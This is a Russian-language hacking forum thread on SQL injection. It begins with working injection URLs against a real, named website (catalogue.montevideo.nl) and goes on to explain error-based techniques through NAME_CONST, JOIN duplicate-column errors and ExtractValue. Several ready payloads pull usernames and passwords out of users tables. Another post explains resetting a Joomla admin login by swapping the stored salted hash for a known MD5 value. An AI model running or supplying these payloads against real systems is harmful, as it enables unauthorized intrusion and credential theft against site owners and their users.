Не точно 3. Там явно видно, что переменная подставляется в несколько запросов с различным количеством колумнов.

http://catalogue.montevideo.nl/code.php?id=-1+order+by+1,2,3--+

http://catalogue.montevideo.nl/code.php?id=-1+order+by+1,2,3,4,5,6--+

Инфу можно тащить например так

http://catalogue.montevideo.nl/code.php?id=1+union+select+1,count(*),concat((sele ct+user+from+watsnext.cata_users+limit+1,1),0x3a,f loor(rand(0)*2))+x+from+information_schema.tables+ group+by+x--+

На что-либо кроме version() будет возвращаться ошибка Incorrect arguments to NAME_CONST. С чем это связано я лично не знаю.

Я полагаю это косяк функции name_const в этой версии мускуля, т.е. передаваемое как аргумент функции не является постоянным значением (т.е. константой). Вот затестил, если указывать допустим concat(1,0x3a,1), то ошибка, а если просто 1, то ошибка нету. В версии 5.0.32 получилось сделать select table_name в schema, а в 5.0.67 ошибка.

Сори за поднятие этой темы ,обясните кто нить в деталях о скуле с использованием ExtractValue и name_const и -1 UNION SELECT * FROM (SELECT * FROM users JOIN users b)a
-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id))a

Смотреть таблы с конфигами, возможно будет адрес сайта.
Особые условия.

Запрос JOIN объединяет 2 таблички и колонки этих двух табличек. Т.е. допустим если у нас есть 2 таблички и которых есть колонки id, то у нас выводиться "дубликат error 'и тут допустим название колонки дупликата'"
пример: -1+and+1=(select+*+from+(select+*+from+codes+a+JOIN +codes+b)c)--
Выведет в дупликат эроре название колонки 1. Допустим она называется id, с таблички codes,
чтобы вывести вторую колонку, исключаем первую функией USING.
пример: пример: -1+and+1=(select+*+from+(select+*+from+codes+a+JOIN +codes+b+USING(id))c--
Если же добавить к запросу ещё и name_const, то можно выводить не только колонки, но и данные.
например: -1+and+1=(select+*+from+(select+*+from+(SELECT+NAME _CONST((SELECT
password+FROM+users+LIMIT+1),1)x)+a+JOIN+(SELECT+N AME_CONST((SELECT
passwd+FROM+users+LIMIT+1),1)x)+b+USING(id))c--
На счёт ExtractValue, то это только для версии от 5.1.5 вроде..Т.е. функция EXTRACTVALUE извлекает значения элемента из документа XML, но заместь документа, ты вписуешь подзапрос. Допустим Extractvalue((version()),1)
Про дубликаты, есть отличная статья тут, потому как все детали описывать долговато..
h_ttp://www.xakep.ru/post/50554/
или ещё информация об этом, тут.
h_ttp://bugs.mysql.com/bug.php?id=8652

Если где синтаксическая ошибка, прийду исправлю, а то спешу по делам.

Что серьёзно?)) Уважаемый, я вообще-то написал о синтаксических ошибках в моём тексте Ну да ладно. Видимо кто-то уже набрался не дождавшись нового года))

Воппрос по поводу джумлы - это не бреш случайно. Я забыл пасс в джумле : там была соль какая то 7c17fc4ad64ac1761a316464ccb106d7:ZZRM2g8cW3w0b0o2w rtqkn4H97CPOqYn если заменить на суму от md5 например, я заменил на 111 это 698d51a19d8a121ce581499d7b701668, то работает. Заходит в админку при вводе 111. Код не смотрел, а то хз как то все заумно написано не знаеш что к чему относиться)

Шас написал тестовый скрипт, чтобы потренероваться со скулями на локалхосте, так вот почему чтобы вывести поле из таблицы надо чтобы было минимум три выводимых поля? или я ошибаюсь? подскажите плиз.

Ты ошибаешься.
Может быть и одно...